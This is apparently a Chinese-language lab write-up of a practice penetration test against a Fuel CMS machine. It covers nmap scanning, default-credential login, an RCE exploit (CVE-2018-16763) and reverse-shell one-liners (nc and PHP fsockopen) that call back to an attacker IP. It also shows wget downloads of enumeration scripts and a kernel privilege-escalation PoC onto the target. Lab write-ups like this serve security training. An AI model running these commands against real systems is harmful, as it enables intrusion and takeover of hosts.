下一題,要先連到遠端的kali再做掃描,否則掃不到:
┌──(kali㉿kali)-[~]
└─$ rdesktop 172.16.253.19 -g 90%
Autoselecting keyboard map 'en-us' from locale
Connection established using plain RDP.
連上遠端桌面後,一樣老梗的先粗略nmap再詳細nmap:
┌──(root㉿kali)-[~]
└─# nmap -p- 172.16.1.120
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-12 01:01 EST
Nmap scan report for 172.16.1.120
Host is up (0.046s latency).
Not shown: 65527 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
25/tcp open smtp
53/tcp open domain
110/tcp open pop3
139/tcp open netbios-ssn
143/tcp open imap
445/tcp open microsoft-ds
8081/tcp open blackice-icecap
Nmap done: 1 IP address (1 host up) scanned in 27.37 seconds
┌──(root㉿kali)-[~]
└─# nmap -p22,25,53,110,139,143,445,8081 172.16.1.120 -sC -sV -O -A
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-12 01:02 EST
Nmap scan report for 172.16.1.120
Host is up (0.017s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 d236aef714f27c5dba262e9b405355c5 (RSA)
| 256 1b8a0440b432f13f11c824e8cbaf771f (ECDSA)
|_ 256 704228800dd468fb069c6ed304dac161 (ED25519)
25/tcp open smtp Postfix smtpd
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=FuleCMS
| Not valid before: 2020-08-20T16:26:53
|_Not valid after: 2030-08-18T16:26:53
|_smtp-commands: FuleCMS, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN
53/tcp open domain ISC BIND 9.10.3-P4 (Ubuntu Linux)
| dns-nsid:
|_ bind.version: 9.10.3-P4-Ubuntu
110/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: SASL AUTH-RESP-CODE UIDL RESP-CODES PIPELINING TOP CAPA
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open imap Dovecot imapd
|_imap-capabilities: ENABLE IMAP4rev1 more capabilities have LOGINDISABLEDA0001 listed post-login SASL-IR IDLE ID OK Pre-login LOGIN-REFERRALS LITERAL+
445/tcp open netbios-ssn Samba smbd 4.3.9-Ubuntu (workgroup: WORKGROUP)
8081/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Welcome to FUEL CMS
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-robots.txt: 1 disallowed entry
|_/fuel/
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.2.0 (94%), Linux 3.11 - 4.1 (94%), Linux 3.16 (93%), Linux 4.4 (93%), Linux 3.10 - 3.16 (92%), Linux 3.13 (90%), Linux 3.16 - 4.6 (89%), Linux 3.2 - 4.9 (89%), Linux 4.2 (89%), Linux 3.2 - 3.8 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Hosts: FuleCMS, FULECMS; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: -2h40m02s, deviation: 4h37m07s, median: -3s
|_nbstat: NetBIOS name: FULECMS, NetBIOS user: <unknown>, NetBIOS MAC: 000000000000 (Xerox)
| smb2-security-mode:
| 311:
|_ Message signing enabled but not required
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.9-Ubuntu)
| Computer name: fulecms
| NetBIOS computer name: FULECMS\x00
| Domain name: \x00
| FQDN: fulecms
|_ System time: 2023-03-12T14:03:07+08:00
| smb2-time:
| date: 2023-03-12T06:03:06
|_ start_date: N/A
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
TRACEROUTE (using port 25/tcp)
HOP RTT ADDRESS
1 61.59 ms 192.168.200.1
2 10.17 ms 172.16.1.120
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.94 seconds
看到8081 port有fuel資料夾,用http://172.16.1.120:8081/fuel網址連連看:
看到稀罕cms先找找預設的帳密:
試試看:
還真的進去了:
可以看看版本號:
找找exploit-db:
看看其中一個:
從上面的網頁知道EDB-ID(50477)後,之後都可以在本機操縱,把poc複製過來後使用,成功get shell:
┌──(root㉿kali)-[~]
└─# cd /home/kali/PT_day3
┌──(root㉿kali)-[/home/kali/PT_day3]
└─# searchsploit -m 50477
Exploit: Fuel CMS 1.4.1 - Remote Code Execution (3)
URL: https://www.exploit-db.com/exploits/50477
Path: /usr/share/exploitdb/exploits/php/webapps/50477.py
Codes: CVE-2018-16763
Verified: False
File Type: Python script, ASCII text executable
Copied to: /home/kali/PT_day3/50477.py
┌──(root㉿kali)-[/home/kali/PT_day3]
└─# python 50477.py -u http://172.16.1.120:8081
[+]Connecting...
Enter Command $whoami
systemwww-data
翻翻看有什麼東西:
Enter Command $ls -l
systemtotal 56
-rwxrwxr-x 1 www-data www-data 1427 Mar 31 2017 README.md
drwxrwxr-x 9 www-data www-data 4096 Mar 31 2017 assets
-rwxrwxr-x 1 www-data www-data 193 Mar 31 2017 composer.json
-rwxrwxr-x 1 www-data www-data 6502 Mar 31 2017 contributing.md
drwxrwxr-x 9 www-data www-data 4096 Mar 31 2017 fuel
-rwxrwxr-x 1 www-data www-data 11321 Aug 21 2020 index.html
-rwxrwxr-x 1 www-data www-data 11802 Mar 31 2017 index.php
-rwxrwxr-x 1 www-data www-data 20 Aug 21 2020 phpinfo.php
-rwxrwxr-x 1 www-data www-data 30 Mar 31 2017 robots.txt
Enter Command $ls ./assets -l
systemtotal 28
drwxrwxr-x 2 www-data www-data 4096 Mar 31 2017 cache
drwxrwxr-x 2 www-data www-data 4096 Mar 31 2017 css
drwxrwxr-x 2 www-data www-data 4096 Mar 31 2017 docs
drwxrwxr-x 2 www-data www-data 4096 Mar 31 2017 images
drwxrwxr-x 2 www-data www-data 4096 Mar 31 2017 js
drwxrwxr-x 2 www-data www-data 4096 Mar 31 2017 pdf
drwxrwxr-x 2 www-data www-data 4096 Mar 31 2017 swf
發現有上傳頁面,把burp suite打開準備:
找找看本機的reverse shell腳本:
┌──(root㉿kali)-[~]
└─# cd /usr/share/webshells
┌──(root㉿kali)-[/usr/share/webshells]
└─# ls -al
total 40
drwxr-xr-x 8 root root 4096 Aug 8 2022 .
drwxr-xr-x 342 root root 12288 Feb 19 02:19 ..
drwxr-xr-x 2 root root 4096 Aug 8 2022 asp
drwxr-xr-x 2 root root 4096 Aug 8 2022 aspx
drwxr-xr-x 2 root root 4096 Aug 8 2022 cfm
drwxr-xr-x 2 root root 4096 Aug 8 2022 jsp
lrwxrwxrwx 1 root root 19 Aug 8 2022 laudanum -> /usr/share/laudanum
drwxr-xr-x 2 root root 4096 Aug 8 2022 perl
drwxr-xr-x 3 root root 4096 Dec 10 02:17 php
┌──(root㉿kali)-[/usr/share/webshells]
└─# cd php
┌──(root㉿kali)-[/usr/share/webshells/php]
└─# ls -al
total 196
drwxr-xr-x 3 root root 4096 Dec 10 02:17 .
drwxr-xr-x 8 root root 4096 Aug 8 2022 ..
drwxr-xr-x 2 root root 4096 Aug 8 2022 findsocket
-rw-r--r-- 1 root root 2800 Nov 20 2021 php-backdoor.php
-rwxr-xr-x 1 root root 5496 Dec 10 00:42 php-reverse-shell.php
-rwxr-xr-x 1 root root 5500 Dec 10 02:17 php-reverse-shell.png
-rw-r--r-- 1 root root 13585 Nov 20 2021 qsd-php-backdoor.php
-rw-r--r-- 1 root root 328 Nov 20 2021 simple-backdoor.php
-rwxrwxrwx 1 root root 147181 Dec 10 01:35 test1.jpeg
┌──(root㉿kali)-[/usr/share/webshells/php]
└─# cp php-reverse-shell.php /home/kali/PT_day3
┌──(root㉿kali)-[/usr/share/webshells/php]
└─# cd /home/kali/PT_day3
┌──(root㉿kali)-[/home/kali/PT_day3]
└─# ls -al
total 52
drwxr-xr-x 2 root root 4096 Mar 12 03:19 .
drwxr-xr-x 22 kali kali 4096 Mar 12 03:18 ..
-rw-r--r-- 1 root root 5036 Mar 11 23:59 42558-1.py
-rwxr-xr-x 1 root root 4925 Mar 11 23:54 42558.py
-rwxr-xr-x 1 root root 3680 Mar 11 23:08 44156.py
-rwxr-xr-x 1 root root 1836 Mar 12 01:37 50477.py
-rwxr-xr-x 1 root root 5495 Feb 27 06:38 bbb_reverse.php
-rwxr-xr-x 1 root root 996 Mar 11 21:03 freeswitch.py
-rwxr-xr-x 1 root root 5496 Mar 12 03:19 php-reverse-shell.php
┌──(root㉿kali)-[/home/kali/PT_day3]
└─# vim php-reverse-shell.php
改以下兩行:
改一下檔名,避免無法上傳:
┌──(root㉿kali)-[/home/kali/PT_day3]
└─# mv php-reverse-shell.php php-reverse-shell.jpg
試著上傳看看:
在上傳時,因為burp suite開啟了攔截,所以會顯示一些東西。
可以看到上圖2就是上傳上去的jpg,但其實是php,所以可以改成php如下圖紅圈:
改完檔名後按下burp的forward後,跳到以下畫面,找找上傳後跑到哪個位址:
但實際上找不到,因為:
只好再次使用剛剛的50477,利用它可以get shell的特性,做reverse shell:
先監聽:
┌──(root㉿kali)-[/home/kali/PT_day3]
└─# nc -lvnp 1234
listening on [any] 1234 ...
打上在網頁上抄的指令:
Enter Command $php -r '$sock=fsockopen("192.168.200.6",1234);exec("sh <&3 >&3 2>&3");'
<br />
<b>Parse error</b>: syntax error, unexpected '$sock' (T_VARIABLE) in <b>/var/www/html/fuel/modules/fuel/controllers/Pages.php(924) : runtime-created function</b> on line <b>1</b><br />
代表$符號不能用。
再換別的:
┌──(root㉿kali)-[/home/kali/PT_day3]
└─# python 50477.py -u http://172.16.1.120:8081
[+]Connecting...
Enter Command $rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 192.168.200.6 1234 >/tmp/f
監聽,並成功反彈:
┌──(kali㉿kali)-[~]
└─$ nc -lvnp 1234
listening on [any] 1234 ...
connect to [192.168.200.6] from (UNKNOWN) [172.16.1.120] 57974
sh: 0: can't access tty; job control turned off
翻一下攻擊機,記得之前應該有下載枚舉工具linenum跟linpeas。
┌──(kali㉿kali)-[~]
└─$ sudo -i
[sudo] password for kali:
┌──(root㉿kali)-[~]
└─# cd /home/kali
┌──(root㉿kali)-[/home/kali]
└─# ls -al
total 972
drwxr-xr-x 22 kali kali 4096 Mar 12 03:56 .
drwxr-xr-x 4 root root 4096 Jan 15 00:59 ..
-rw-r--r-- 1 kali kali 220 Aug 8 2022 .bash_logout
-rw-r--r-- 1 kali kali 5551 Aug 8 2022 .bashrc
-rw-r--r-- 1 kali kali 3526 Aug 8 2022 .bashrc.original
drwx------ 6 kali kali 4096 Feb 19 07:36 .BurpSuite
drwxr-xr-x 10 kali kali 4096 Feb 19 04:23 .cache
drwxr-xr-x 15 kali kali 4096 Feb 27 06:51 .config
-rw-r--r-- 1 kali kali 4715 Mar 11 03:16 cyberlab.ovpn
drwxr-xr-x 2 kali kali 4096 Dec 10 01:17 Desktop
-rw-r--r-- 1 kali kali 35 Nov 7 06:23 .dmrc
drwxr-xr-x 2 kali kali 4096 Nov 7 06:23 Documents
drwxr-xr-x 2 kali kali 4096 Mar 11 03:17 Downloads
-rw-r--r-- 1 kali kali 11759 Aug 8 2022 .face
lrwxrwxrwx 1 kali kali 5 Aug 8 2022 .face.icon -> .face
drwx------ 3 kali kali 4096 Nov 7 06:23 .gnupg
-rw------- 1 kali kali 0 Nov 7 06:23 .ICEauthority
drwxr-xr-x 4 kali kali 4096 Feb 19 05:32 .java
-rw-r--r-- 1 root root 776167 Apr 17 2022 linpeas.sh
drwx------ 3 kali kali 4096 Nov 7 06:23 .local
drwx------ 5 kali kali 4096 Nov 13 02:21 .mozilla
drwxr-xr-x 10 kali kali 4096 Feb 26 07:08 .msf4
drwxr-xr-x 2 kali kali 4096 Nov 7 06:23 Music
-rw------- 1 kali kali 103 Dec 10 22:12 .mysql_history
drwxr-xr-x 2 kali kali 4096 Feb 26 06:43 Pictures
-rw-r--r-- 1 kali kali 807 Aug 8 2022 .profile
drwxr-xr-x 2 root root 4096 Mar 12 03:25 PT_day3
drwxr-xr-x 2 kali kali 4096 Nov 7 06:23 Public
drwx------ 2 kali kali 4096 Jan 15 01:42 .ssh
-rw-r--r-- 1 kali kali 0 Nov 13 05:38 .sudo_as_admin_successful
drwxr-xr-x 5 kali kali 4096 Dec 31 01:50 target_machine
drwxr-xr-x 2 kali kali 4096 Nov 7 06:23 Templates
-rw-r----- 1 kali kali 4 Mar 11 20:19 .vboxclient-clipboard.pid
-rw-r----- 1 kali kali 4 Mar 11 20:19 .vboxclient-display-svga-x11.pid
-rw-r----- 1 kali kali 4 Mar 11 20:19 .vboxclient-draganddrop.pid
-rw-r----- 1 kali kali 4 Mar 11 20:19 .vboxclient-seamless.pid
-rw-r----- 1 kali kali 4 Mar 11 20:19 .vboxclient-vmsvga-session-tty7.pid
drwxr-xr-x 2 kali kali 4096 Nov 7 06:23 Videos
-rw------- 1 kali kali 1988 Dec 10 00:41 .viminfo
drwxr-xr-x 2 kali kali 4096 Nov 13 02:19 vulnOSv2
-rw------- 1 kali kali 249 Mar 12 03:56 .Xauthority
-rw------- 1 kali kali 8520 Mar 12 03:50 .xsession-errors
-rw------- 1 kali kali 9187 Mar 11 08:15 .xsession-errors.old
-rw------- 1 kali kali 8349 Mar 12 01:00 .zsh_history
-rw-r--r-- 1 kali kali 10877 Aug 8 2022 .zshrc
┌──(root㉿kali)-[/home/kali]
└─# python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
上面的最後一步建網頁伺服器,以便靶機下載:
$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@FuleCMS:/var/www/html$ cd /
cd /
www-data@FuleCMS:/$ ls -l
ls -l
total 88
drwxr-xr-x 2 root root 4096 Aug 21 2020 bin
drwxr-xr-x 3 root root 4096 Aug 21 2020 boot
drwxr-xr-x 18 root root 4140 May 29 2021 dev
drwxr-xr-x 100 root root 4096 Aug 21 2020 etc
drwxr-xr-x 4 root root 4096 Aug 21 2020 home
lrwxrwxrwx 1 root root 32 Aug 21 2020 initrd.img -> boot/initrd.img-4.4.0-31-generic
drwxr-xr-x 22 root root 4096 Aug 21 2020 lib
drwxr-xr-x 2 root root 4096 Aug 21 2020 lib64
drwx------ 2 root root 16384 Aug 21 2020 lost+found
drwxr-xr-x 4 root root 4096 Aug 21 2020 media
drwxr-xr-x 2 root root 4096 Jul 20 2016 mnt
drwxr-xr-x 2 root root 4096 Jul 20 2016 opt
dr-xr-xr-x 171 root root 0 May 29 2021 proc
drwx------ 2 root root 4096 May 29 2021 root
drwxr-xr-x 27 root root 900 May 29 2021 run
drwxr-xr-x 2 root root 12288 Aug 21 2020 sbin
drwxr-xr-x 2 root root 4096 Jun 30 2016 snap
drwxr-xr-x 2 root root 4096 Jul 20 2016 srv
dr-xr-xr-x 13 root root 0 May 29 2021 sys
drwxrwxrwt 9 root root 4096 Mar 12 15:52 tmp
drwxr-xr-x 10 root root 4096 Aug 21 2020 usr
drwxr-xr-x 14 root root 4096 Aug 21 2020 var
lrwxrwxrwx 1 root root 29 Aug 21 2020 vmlinuz -> boot/vmlinuz-4.4.0-31-generic
www-data@FuleCMS:/$ cd /tmp
cd /tmp
www-data@FuleCMS:/tmp$ ls
ls
f
systemd-private-9f8aca4e3c70461489381ad43cf2d088-dovecot.service-TfyOSV
systemd-private-9f8aca4e3c70461489381ad43cf2d088-systemd-timesyncd.service-3H3aVE
www-data@FuleCMS:/tmp$ wget http://192.168.200.6/linpeas.sh
wget http://192.168.200.6/linpeas.sh
--2023-03-12 16:00:53-- http://192.168.200.6/linpeas.sh
Connecting to 192.168.200.6:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 776167 (758K) [text/x-sh]
Saving to: 'linpeas.sh'
linpeas.sh 100%[===================>] 757.98K 2.22MB/s in 0.3s
2023-03-12 16:00:53 (2.22 MB/s) - 'linpeas.sh' saved [776167/776167]
www-data@FuleCMS:/tmp$ ls -l
ls -l
total 768
prw-r--r-- 1 www-data www-data 0 Mar 12 16:01 f
-rw-r--r-- 1 www-data www-data 776167 Apr 17 2022 linpeas.sh
drwx------ 3 root root 4096 May 29 2021 systemd-private-9f8aca4e3c70461489381ad43cf2d088-dovecot.service-TfyOSV
drwx------ 3 root root 4096 May 29 2021 systemd-private-9f8aca4e3c70461489381ad43cf2d088-systemd-timesyncd.service-3H3aVE
www-data@FuleCMS:/tmp$ wget http://192.168.200.6/LinEnum.sh
wget http://192.168.200.6/LinEnum.sh
--2023-03-12 16:04:52-- http://192.168.200.6/LinEnum.sh
Connecting to 192.168.200.6:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 46631 (46K) [text/x-sh]
Saving to: 'LinEnum.sh'
LinEnum.sh 100%[===================>] 45.54K --.-KB/s in 0.03s
2023-03-12 16:04:52 (1.27 MB/s) - 'LinEnum.sh' saved [46631/46631]
www-data@FuleCMS:/tmp$ chmod +x LinEnum.sh
chmod +x LinEnum.sh
www-data@FuleCMS:/tmp$ chmod +x lin*
chmod +x lin*
www-data@FuleCMS:/tmp$ ls -l
ls -l
total 816
-rwxr-xr-x 1 www-data www-data 46631 Mar 12 16:03 LinEnum.sh
prw-r--r-- 1 www-data www-data 0 Mar 12 16:05 f
-rwxr-xr-x 1 www-data www-data 776167 Apr 17 2022 linpeas.sh
drwx------ 3 root root 4096 May 29 2021 systemd-private-9f8aca4e3c70461489381ad43cf2d088-dovecot.service-TfyOSV
drwx------ 3 root root 4096 May 29 2021 systemd-private-9f8aca4e3c70461489381ad43cf2d088-systemd-timesyncd.service-3H3aVE
找找看不用提權就可找到的文件local.txt:
www-data@FuleCMS:/tmp$ find / -name local.txt -print 2>/dev/null
find / -name local.txt -print 2>/dev/null
/home/test/local.txt
www-data@FuleCMS:/tmp$ cat /home/test/local.txt
cat /home/test/local.txt
9c5060aebbfea6f364af27dcd08393cd -
執行linpeas.sh:(掃描結果太長所以省略)
知道內核版本號:
看看下面這個能不能用:
在本機找到poc:
┌──(kali㉿kali)-[~]
└─$ searchsploit -m 45010
Exploit: Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local Privilege Escalation
URL: https://www.exploit-db.com/exploits/45010
Path: /usr/share/exploitdb/exploits/linux/local/45010.c
Codes: CVE-2017-16995
Verified: True
File Type: C source, ASCII text
Copied to: /home/kali/45010.c
┌──(kali㉿kali)-[~]
└─$ mv 45010.c cve-2017-16995.c
同樣的,讓靶機下載這個poc:
www-data@FuleCMS:/tmp$ wget http://192.168.200.6/cve-2017-16995.c
wget http://192.168.200.6/cve-2017-16995.c
--2023-03-12 16:35:54-- http://192.168.200.6/cve-2017-16995.c
Connecting to 192.168.200.6:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 13176 (13K) [text/x-csrc]
Saving to: 'cve-2017-16995.c'
cve-2017-16995.c 100%[===================>] 12.87K --.-KB/s in 0.03s
2023-03-12 16:35:54 (486 KB/s) - 'cve-2017-16995.c' saved [13176/13176]
www-data@FuleCMS:/tmp$ gcc cve-2017-16995.c -o cve-2017-16995
gcc cve-2017-16995.c -o cve-2017-16995
The program 'gcc' is currently not installed. To run 'gcc' please ask your administrator to install the package 'gcc'
